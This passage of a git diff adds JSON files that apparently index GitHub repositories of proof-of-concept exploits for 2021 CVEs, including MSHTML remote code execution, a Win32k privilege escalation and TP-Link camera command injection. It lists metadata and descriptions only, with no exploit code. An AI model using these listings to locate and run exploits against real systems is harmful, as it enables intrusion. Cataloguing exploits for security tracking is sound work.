"https:\/\/github.com\/tiagob0b", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tiagob0b\/CVE-2021-40444", + "description": null, + "fork": false, + "created_at": "2021-10-24T23:17:12Z", + "updated_at": "2021-10-24T23:17:28Z", + "pushed_at": "2021-10-24T23:17:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 422246280, + "name": "CVE-2021-40444-POC", + "full_name": "kagura-maru\/CVE-2021-40444-POC", + "owner": { + "login": "kagura-maru", + "id": 92495243, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92495243?v=4", + "html_url": "https:\/\/github.com\/kagura-maru", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kagura-maru\/CVE-2021-40444-POC", + "description": "An attempt to reproduce Microsoft MSHTML Remote Code Execution (RCE) Vulnerability and using Metasploit Framework.", + "fork": false, + "created_at": "2021-10-28T14:55:46Z", + "updated_at": "2024-08-12T20:17:37Z", + "pushed_at": "2021-10-31T08:15:00Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 425935080, + "name": "word_mshtml", + "full_name": "Zeop-CyberSec\/word_mshtml", + "owner": { + "login": "Zeop-CyberSec", + "id": 68154603, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68154603?v=4", + "html_url": "https:\/\/github.com\/Zeop-CyberSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Zeop-CyberSec\/word_mshtml", + "description": "Contains the offensive (exploit and auxiliary) modules for the CVE-2021-40444.", + "fork": false, + "created_at": "2021-11-08T17:38:30Z", + "updated_at": "2021-12-11T21:29:07Z", + "pushed_at": "2021-11-09T11:12:53Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 430718153, + "name": "CVE-2021-40444", + "full_name": "Alexcot25051999\/CVE-2021-40444", + "owner": { + "login": "Alexcot25051999", + "id": 94846095, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94846095?v=4", + "html_url": "https:\/\/github.com\/Alexcot25051999", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Alexcot25051999\/CVE-2021-40444", + "description": null, + "fork": false, + "created_at": "2021-11-22T13:29:20Z", + "updated_at": "2021-11-22T13:41:39Z", + "pushed_at": "2021-11-22T13:41:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 431721742, + "name": "CVE-2021-40444-exp", + "full_name": "lisinan988\/CVE-2021-40444-exp", + "owner": { + "login": "lisinan988", + "id": 87479262, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87479262?v=4", + "html_url": "https:\/\/github.com\/lisinan988", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lisinan988\/CVE-2021-40444-exp", + "description": null, + "fork": false, + "created_at": "2021-11-25T05:13:05Z", + "updated_at": "2021-11-25T05:13:19Z", + "pushed_at": "2021-11-25T05:13:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 439810103, + "name": "Microsoft-Office-Word-MSHTML-Remote-Code-Execution-Exploit", + "full_name": "34zY\/Microsoft-Office-Word-MSHTML-Remote-Code-Execution-Exploit", + "owner": { + "login": "34zY", + "id": 55347142, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55347142?v=4", + "html_url": "https:\/\/github.com\/34zY", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/34zY\/Microsoft-Office-Word-MSHTML-Remote-Code-Execution-Exploit", + "description": "CVE-2021-40444", + "fork": false, + "created_at": "2021-12-19T08:16:07Z", + "updated_at": "2024-11-15T16:48:03Z", + "pushed_at": "2021-12-19T08:27:33Z", + "stargazers_count": 64, + "watchers_count": 64, + "has_discussions": false, + "forks_count": 24, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 24, + "watchers": 64, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 442372306, + "name": "CVE-2021-40444", + "full_name": "MRacumen\/CVE-2021-40444", + "owner": { + "login": "MRacumen", + "id": 73010693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73010693?v=4", + "html_url": "https:\/\/github.com\/MRacumen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MRacumen\/CVE-2021-40444", + "description": "Microsoft-Office-Word-MSHTML-Remote-Code-Execution-Exploit", + "fork": false, + "created_at": "2021-12-28T06:33:25Z", + "updated_at": "2021-12-28T09:38:18Z", + "pushed_at": "2021-12-28T06:44:19Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 486415935, + "name": "CVE-2021-40444", + "full_name": "RedLeavesChilde\/CVE-2021-40444", + "owner": { + "login": "RedLeavesChilde", + "id": 104541969, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104541969?v=4", + "html_url": "https:\/\/github.com\/RedLeavesChilde", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RedLeavesChilde\/CVE-2021-40444", + "description": null, + "fork": false, + "created_at": "2022-04-28T02:14:10Z", + "updated_at": "2022-04-28T02:14:10Z", + "pushed_at": "2022-04-28T02:14:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 528470832, + "name": "CVE-2021-40444-Microsoft-Office-Word-Remote-Code-Execution-", + "full_name": "nvchungkma\/CVE-2021-40444-Microsoft-Office-Word-Remote-Code-Execution-", + "owner": { + "login": "nvchungkma", + "id": 59444526, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59444526?v=4", + "html_url": "https:\/\/github.com\/nvchungkma", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nvchungkma\/CVE-2021-40444-Microsoft-Office-Word-Remote-Code-Execution-", + "description": null, + "fork": false, + "created_at": "2022-08-24T14:55:11Z", + "updated_at": "2022-08-24T14:55:11Z", + "pushed_at": "2022-08-24T14:55:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 649499809, + "name": "CVE-2021-40444", + "full_name": "hqdat809\/CVE-2021-40444", + "owner": { + "login": "hqdat809", + "id": 75318916, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75318916?v=4", + "html_url": "https:\/\/github.com\/hqdat809", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hqdat809\/CVE-2021-40444", + "description": null, + "fork": false, + "created_at": "2023-06-05T02:27:21Z", + "updated_at": "2023-06-05T02:29:52Z", + "pushed_at": "2023-06-05T02:29:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 834897913, + "name": "Follina-CVE-and-CVE-2021-40444", + "full_name": "basim-ahmad\/Follina-CVE-and-CVE-2021-40444", + "owner": { + "login": "basim-ahmad", + "id": 106730920, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106730920?v=4", + "html_url": "https:\/\/github.com\/basim-ahmad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/basim-ahmad\/Follina-CVE-and-CVE-2021-40444", + "description": "This repository contains scripts and resources for exploiting the Follina CVE and CVE-2021-40444 vulnerabilities in Microsoft Office. The scripts generate malicious document files that can execute arbitrary code on the target system.", + "fork": false, + "created_at": "2024-07-28T17:23:43Z", + "updated_at": "2024-07-29T06:57:10Z", + "pushed_at": "2024-07-29T06:57:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-40449.json b/2021/CVE-2021-40449.json new file mode 100644 index 0000000000..4178f2990f --- /dev/null +++ b/2021/CVE-2021-40449.json @@ -0,0 +1,254 @@ +[ + { + "id": 417881648, + "name": "CallbackHell", + "full_name": "ly4k\/CallbackHell", + "owner": { + "login": "ly4k", + "id": 53348818, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53348818?v=4", + "html_url": "https:\/\/github.com\/ly4k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ly4k\/CallbackHell", + "description": "Exploit for CVE-2021-40449 - Win32k Elevation of Privilege Vulnerability (LPE)", + "fork": false, + "created_at": "2021-10-16T16:17:44Z", + "updated_at": "2024-11-18T14:33:34Z", + "pushed_at": "2021-11-11T17:09:56Z", + "stargazers_count": 462, + "watchers_count": 462, + "has_discussions": false, + "forks_count": 91, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-40449" + ], + "visibility": "public", + "forks": 91, + "watchers": 462, + "score": 0, + "subscribers_count": 13 + }, + { + "id": 419264342, + "name": "CVE-2021-40449-Exploit", + "full_name": "KaLendsi\/CVE-2021-40449-Exploit", + "owner": { + "login": "KaLendsi", + "id": 68001644, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68001644?v=4", + "html_url": "https:\/\/github.com\/KaLendsi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KaLendsi\/CVE-2021-40449-Exploit", + "description": "windows 10 14393 LPE", + "fork": false, + "created_at": "2021-10-20T09:24:36Z", + "updated_at": "2024-11-06T08:14:41Z", + "pushed_at": "2021-10-28T03:51:09Z", + "stargazers_count": 94, + "watchers_count": 94, + "has_discussions": false, + "forks_count": 46, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 46, + "watchers": 94, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 420883668, + "name": "CVE-2021-40449", + "full_name": "hakivvi\/CVE-2021-40449", + "owner": { + "login": "hakivvi", + "id": 67718634, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67718634?v=4", + "html_url": "https:\/\/github.com\/hakivvi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hakivvi\/CVE-2021-40449", + "description": "LPE exploit for a UAF in Windows (CVE-2021-40449).", + "fork": false, + "created_at": "2021-10-25T04:58:49Z", + "updated_at": "2024-11-06T08:16:28Z", + "pushed_at": "2021-11-05T06:54:10Z", + "stargazers_count": 40, + "watchers_count": 40, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-40449" + ], + "visibility": "public", + "forks": 15, + "watchers": 40, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 425552572, + "name": "CVE-2021-40449_poc", + "full_name": "Kristal-g\/CVE-2021-40449_poc", + "owner": { + "login": "Kristal-g", + "id": 61376744, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61376744?v=4", + "html_url": "https:\/\/github.com\/Kristal-g", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Kristal-g\/CVE-2021-40449_poc", + "description": "Exploit for CVE-2021-40449", + "fork": false, + "created_at": "2021-11-07T16:15:19Z", + "updated_at": "2024-10-27T03:30:12Z", + "pushed_at": "2021-11-07T16:21:20Z", + "stargazers_count": 52, + "watchers_count": 52, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 52, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 427341436, + "name": "cve-2021-40449-poc", + "full_name": "CppXL\/cve-2021-40449-poc", + "owner": { + "login": "CppXL", + "id": 36043454, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36043454?v=4", + "html_url": "https:\/\/github.com\/CppXL", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CppXL\/cve-2021-40449-poc", + "description": null, + "fork": false, + "created_at": "2021-11-12T11:49:10Z", + "updated_at": "2022-04-13T09:55:40Z", + "pushed_at": "2021-11-12T13:28:33Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 461544780, + "name": "CVE-2021-40449-NtGdiResetDC-UAF", + "full_name": "BL0odz\/CVE-2021-40449-NtGdiResetDC-UAF", + "owner": { + "login": "BL0odz", + "id": 38938632, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38938632?v=4", + "html_url": "https:\/\/github.com\/BL0odz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BL0odz\/CVE-2021-40449-NtGdiResetDC-UAF", + "description": null, + "fork": false, + "created_at": "2022-02-20T16:23:26Z", + "updated_at": "2023-07-13T21:12:59Z", + "pushed_at": "2022-02-20T16:34:32Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 466221042, + "name": "voidmap", + "full_name": "SamuelTulach\/voidmap", + "owner": { + "login": "SamuelTulach", + "id": 16323119, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16323119?v=4", + "html_url": "https:\/\/github.com\/SamuelTulach", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SamuelTulach\/voidmap", + "description": "Using CVE-2021-40449 to manual map kernel mode driver", + "fork": false, + "created_at": "2022-03-04T17:55:52Z", + "updated_at": "2024-10-15T23:58:03Z", + "pushed_at": "2022-03-05T18:34:25Z", + "stargazers_count": 99, + "watchers_count": 99, + "has_discussions": false, + "forks_count": 32, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 32, + "watchers": 99, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 667239570, + "name": "CVE-2021-40449", + "full_name": "toanthang1842002\/CVE-2021-40449", + "owner": { + "login": "toanthang1842002", + "id": 75765145, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75765145?v=4", + "html_url": "https:\/\/github.com\/toanthang1842002", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/toanthang1842002\/CVE-2021-40449", + "description": null, + "fork": false, + "created_at": "2023-07-17T04:07:44Z", + "updated_at": "2023-07-17T04:09:49Z", + "pushed_at": "2023-07-17T04:10:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-4045.json b/2021/CVE-2021-4045.json new file mode 100644 index 0000000000..36f2a60d0a --- /dev/null +++ b/2021/CVE-2021-4045.json @@ -0,0 +1,105 @@ +[ + { + "id": 428303672, + "name": "CVE-2021-4045", + "full_name": "hacefresko\/CVE-2021-4045", + "owner": { + "login": "hacefresko", + "id": 47251535, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47251535?v=4", + "html_url": "https:\/\/github.com\/hacefresko", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hacefresko\/CVE-2021-4045", + "description": "Exploit for command injection vulnerability found in uhttpd binary from TP-Link Tapo c200 IP camera", + "fork": false, + "created_at": "2021-11-15T14:48:14Z", + "updated_at": "2024-11-24T15:43:36Z", + "pushed_at": "2024-10-31T18:50:48Z", + "stargazers_count": 71, + "watchers_count": 71, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-4045", + "iot", + "poc", + "security", + "wifi-camera" + ], + "visibility": "public", + "forks": 10, + "watchers": 71, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 549638519, + "name": "CVE-2021-4045", + "full_name": "jeffbezosispogg\/CVE-2021-4045", + "owner": { + "login": "jeffbezosispogg", + "id": 115220819, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115220819?v=4", + "html_url": "https:\/\/github.com\/jeffbezosispogg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jeffbezosispogg\/CVE-2021-4045", + "description": "TP-Link Tapo c200 ver <1.1.15 - Remote Code Execution (RCE)", + "fork": false, + "created_at": "2022-10-11T13:56:15Z", + "updated_at": "2022-10-09T01:03:06Z", + "pushed_at": "2022-10-08T04:25:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 735840223, + "name": "CVE-2021-4045", + "full_name": "pl4int3xt\/CVE-2021-4045", + "owner": { + "login": "pl4int3xt", + "id": 62325297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62325297?v=4", + "html_url": "https:\/\/github.com\/pl4int3xt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pl4int3xt\/CVE-2021-4045", + "description": "🔐 \"PWNTAPO: Unveiling Command Injection in TP-Link Tapo C200 Cameras (<= v1.1.16 Build 211209)\" 🔓", + "fork": false, + "created_at": "2023-12-26T08:20:49Z", + "updated_at": "2024-07-21T18:24:15Z", + "pushed_at": "2023-12-27T13:33:01Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-4045", + "hackingtools", + "iot" + ], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-40492.json b/2021/CVE-2021-40492.json new file mode 100644 index 0000000000..0e010221dc --- /dev/null +++ b/2021/CVE-2021-40492.json @@ -0,0 +1,33 @@ +[ + { + "id": 402473190, + "name": "CVE-2021-40492", + "full_name": "5qu1n7\/CVE-2021-40492", + "owner": { + "login": "5qu1n7", + "id": 44474414, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44474414?v=4", + "html_url": "https:\/\/github.com\/5qu1n7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/5qu1n7\/CVE-2021-40492", + "description": "CVE-2021-40492 Gibbon version 22 Reflected Cross Site Scripting (XSS)", + "fork": false, + "created_at": "2021-09-02T15:33:12Z", + "updated_at": "2021-10-06T19:30:40Z", + "pushed_at": "2021-09-03T17:47:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-40512.json b/2021/CVE-2021-40512.json new file mode 100644 index 0000000000..7a7f24e04b --- /dev/null +++ b/2021/CVE-2021-40512.json @@ -0,0 +1,33 @@ +[ + { + "id": 401232280, + "name": "CVE-2021-40512", + "full_name": "war4uthor\/CVE-2021-40512", + "owner": { + "login": "war4uthor", + "id": 45926018, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45926018?v=4", + "html_url": "https:\/\/github.com\/war4uthor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/war4uthor\/CVE-2021-40512", + "description": "CVE-2021-40512 OSCAR McMaster 19.40~1235 SQL Injection Vulnerability.", + "fork": false, + "created_at": "2021-08-30T05:57:54Z", + "updated_at": "2021-10-26T06:17:49Z", + "pushed_at": "2021-09-05T17:19:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-40513.json b/2021/CVE-2021-40513.json new file mode 100644 index 0000000000..02fff7e5fe --- /dev/null +++ b/2021/CVE-2021-40513.json @@ -0,0 +1,33 @@ +[ + { + "id": 401232144, + "name": "CVE-2021-40513", + "full_name": "war4uthor\/CVE-2021-40513", + "owner": { + "login": "war4uthor", + "id": 45926018, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45926018?v=4", + "html_url": "https:\/\/github.com\/war4uthor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/war4uthor\/CVE-2021-40513", + "description": "CVE-2021-40513 OSCAR McMaster 19.40~1235 Reflected Cross Site Scripting Vulnerability.", + "fork": false, + "created_at": "2021-08-30T05:57:13Z", + "updated_at": "2021-10-26T06:16:14Z", + "pushed_at": "2021-09-05T17:20:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-40514.json b/2021/CVE-2021-40514.json new file mode 100644 index 0000000000..5b6414d182 --- /dev/null +++ b/2021/CVE-2021-40514.json @@ -0,0 +1,33 @@ +[ + { + "id": 401232038, + "name": "CVE-2021-40514", + "full_name": "war4uthor\/CVE-2021-40514", + "owner": { + "login": "war4uthor", + "id": 45926018, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45926018?v=4", + "html_url": "https:\/\/github.com\/war4uthor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/war4uthor\/CVE-2021-40514", + "description": "CVE-2021-40514 OSCAR McMaster 19.40~1235 Stored Cross Site Scripting Vulnerability.", + "fork": false, + "created_at": "2021-08-30T05:56:42Z", + "updated_at": "2021-10-26T06:17:14Z", + "pushed_at": "2021-09-05T17:20:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-40531.json b/2021/CVE-2021-40531.json new file mode 100644 index 0000000000..bb28c600c6 --- /dev/null +++ b/2021/CVE-2021-40531.json @@ -0,0 +1,37 @@ +[ + { + "id": 429884385, + "name": "CVE-2021-40531", + "full_name": "jonpalmisc\/CVE-2021-40531", + "owner": { + "login": "jonpalmisc", + "id": 41548458, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41548458?v=4", + "html_url": "https:\/\/github.com\/jonpalmisc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jonpalmisc\/CVE-2021-40531", + "description": "Quarantine bypass and RCE vulnerability in Sketch (proof-of-concept)", + "fork": false, + "created_at": "2021-11-19T17:38:34Z", + "updated_at": "2023-03-12T19:22:43Z", + "pushed_at": "2021-11-22T14:52:04Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "macos", + "sketch" + ], + "visibility": "public", + "forks": 3, + "watchers": 12, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-40539.json b/2021/CVE-2021-40539.json new file mode 100644 index 0000000000..ae47ed845c --- /dev/null +++ b/2021/CVE-2021-40539.json @@ -0,0 +1,157 @@ +[ + { + "id": 407383795, + "name": "CVE-2021-40539", + "full_name": "DarkSprings\/CVE-2021-40539", + "owner": { + "login": "DarkSprings", + "id": 90366126, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90366126?v=4", + "html_url": "https:\/\/github.com\/DarkSprings", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DarkSprings\/CVE-2021-40539", + "description": "CVE-2021-40539 POC", + "fork": false, + "created_at": "2021-09-17T02:51:40Z", + "updated_at": "2021-11-09T16:02:02Z", + "pushed_at": "2021-09-17T02:56:19Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 424264582, + "name": "CVE-2021-40539", + "full_name": "synacktiv\/CVE-2021-40539", + "owner": { + "login": "synacktiv", + "id": 50145679, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50145679?v=4", + "html_url": "https:\/\/github.com\/synacktiv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/synacktiv\/CVE-2021-40539", + "description": "Exploitation code for CVE-2021-40539", + "fork": false, + "created_at": "2021-11-03T14:49:27Z", + "updated_at": "2024-09-05T10:21:26Z", + "pushed_at": "2021-11-09T11:15:19Z", + "stargazers_count": 46, + "watchers_count": 46, + "has_discussions": false, + "forks_count": 20, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 20, + "watchers": 46, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 871545050, + "name": "CVE-2021-40539", + "full_name": "lpyzds\/CVE-2021-40539", + "owner": { + "login": "lpyzds", + "id": 178446553, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/178446553?v=4", + "html_url": "https:\/\/github.com\/lpyzds", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lpyzds\/CVE-2021-40539", + "description": "CVE-2021-40539:ADSelfService Plus RCE漏洞", + "fork": false, + "created_at": "2024-10-12T09:01:42Z", + "updated_at": "2024-10-12T09:06:21Z", + "pushed_at": "2024-10-12T09:06:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 871547174, + "name": "CVE-2021-40539", + "full_name": "lpyydxs\/CVE-2021-40539", + "owner": { + "login": "lpyydxs", + "id": 184594317, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/184594317?v=4", + "html_url": "https:\/\/github.com\/lpyydxs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lpyydxs\/CVE-2021-40539", + "description": "CVE-2021-40539:ADSelfService Plus RCE漏洞", + "fork": false, + "created_at": "2024-10-12T09:09:00Z", + "updated_at": "2024-10-12T09:15:57Z", + "pushed_at": "2024-10-12T09:15:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 873560102, + "name": "ADSelfService-Plus-RCE-CVE-2021-40539", + "full_name": "Bu0uCat\/ADSelfService-Plus-RCE-CVE-2021-40539", + "owner": { + "login": "Bu0uCat", + "id": 169526025, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/169526025?v=4", + "html_url": "https:\/\/github.com\/Bu0uCat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Bu0uCat\/ADSelfService-Plus-RCE-CVE-2021-40539", + "description": "ADSelfService Plus RCE漏洞 检测工具 (二开)", + "fork": false, + "created_at": "2024-10-16T11:23:43Z", + "updated_at": "2024-10-17T01:41:44Z", + "pushed_at": "2024-10-16T11:33:49Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-40822.json b/2021/CVE-2021-40822.json new file mode 100644 index 0000000000..767e6433dc --- /dev/null +++ 